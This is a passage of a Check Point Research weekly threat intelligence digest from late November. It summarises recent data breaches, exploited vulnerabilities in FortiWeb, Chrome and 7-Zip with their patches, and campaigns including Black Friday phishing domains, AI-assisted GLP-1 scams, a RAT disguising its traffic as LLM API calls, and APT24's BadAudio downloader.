  • French social security service provider Pajemploi has suffered a data breach that resulted in the theft of personal data linked to up to 1.2 million private employers using its childcare services. Exposed information reportedly includes full names, places of birth, postal addresses, Social Security numbers, Pajemploi and accreditation numbers, and banking institution names.
  • AIPAC, a US political advocacy organization, has encountered a data breach tied to an external third-party system, with notification filed to the Maine attorney general on November 14th. Unauthorized access occurred between October 2024 and February 2025, impacting 810 individuals and exposing personal identifiers. No threat actor claimed responsibility.

VULNERABILITIES AND PATCHES

  • Fortinet warned of CVE-2025-58034, a FortiWeb command injection flaw actively exploited in the wild. The bug lets authenticated attackers run unauthorized code via crafted requests, with updates available for multiple 7.x and 8.x releases.

Check Point IPS provides protection against this threat (Fortinet FortiWeb Command Injection (CVE-2025-58034))

  • Google fixed CVE-2025-13223, a high-severity type confusion flaw in Chrome’s V8 engine. The bug is being actively exploited to run malicious code via crafted web pages. Google has issued fixes in Chrome 142.0.7444.175 and later.
  • Researchers warn of active exploitation and a public proof of concept for CVE-2025-11001, a 7-Zip vulnerability on Windows that lets attackers run code by abusing ZIP symbolic link handling. The flaw carries a CVSS score of 7.0 and was fixed in 7-Zip version 25.00.

THREAT INTELLIGENCE REPORTS

  • Check Point Research uncovered a surge in fraudulent Black Friday domains and brand impersonation. Roughly 1 in 11 new Black Friday domains are malicious, and 1 in 25 domains referencing Amazon, AliExpress, or Alibaba pose active threats, with fake storefronts stealing credentials and payment data. Recent examples also mimic HOKA and AliExpress.
  • Check Point researchers detailed a Europe-wide scam in which criminal networks use generative AI to impersonate health regulators and sell fake GLP-1 weight-loss products. The criminals clone logos and endorsements from the official health services, then localize persuasive ads to exploit drug shortages and public trust.
  • Akamai discovered a RAT that disguises its C2 traffic as LLM chat completions API requests, sending Base64- and XOR-encoded payloads without standard headers. The malware steals data from remote access tools and browsers and deploys a .NET proxy toolkit with persistence.
  • Researchers analyzed a Howling Scorpius campaign that used fake CAPTCHA prompts to install SectopRAT on a global data storage and infrastructure company, enabling remote control and lateral movement. Over 42 days, the attackers stole nearly 1 TB of data, deleted cloud backups, and deployed Akira ransomware across three networks, halting operations.
  • Google analyzed a nearly three-year APT24 cyber-espionage campaign centered on the BadAudio C++ downloader, which uses AES-encrypted C2 traffic, cookie-embedded host profiling, and control-flow flattening to deploy payloads such as Cobalt Strike Beacon in memory. The research details how APT24 shifted from strategic web compromises to large-scale supply-chain and spear-phishing operations that weaponize FingerprintJS-based browser fingerprinting, DLL search-order hijacking, and repeatedly re-compromised Taiwanese marketing infrastructure to deliver BadAudio across more than 1,000 domains.

The post 24th November – Threat Intelligence Report appeared first on Check Point Research.
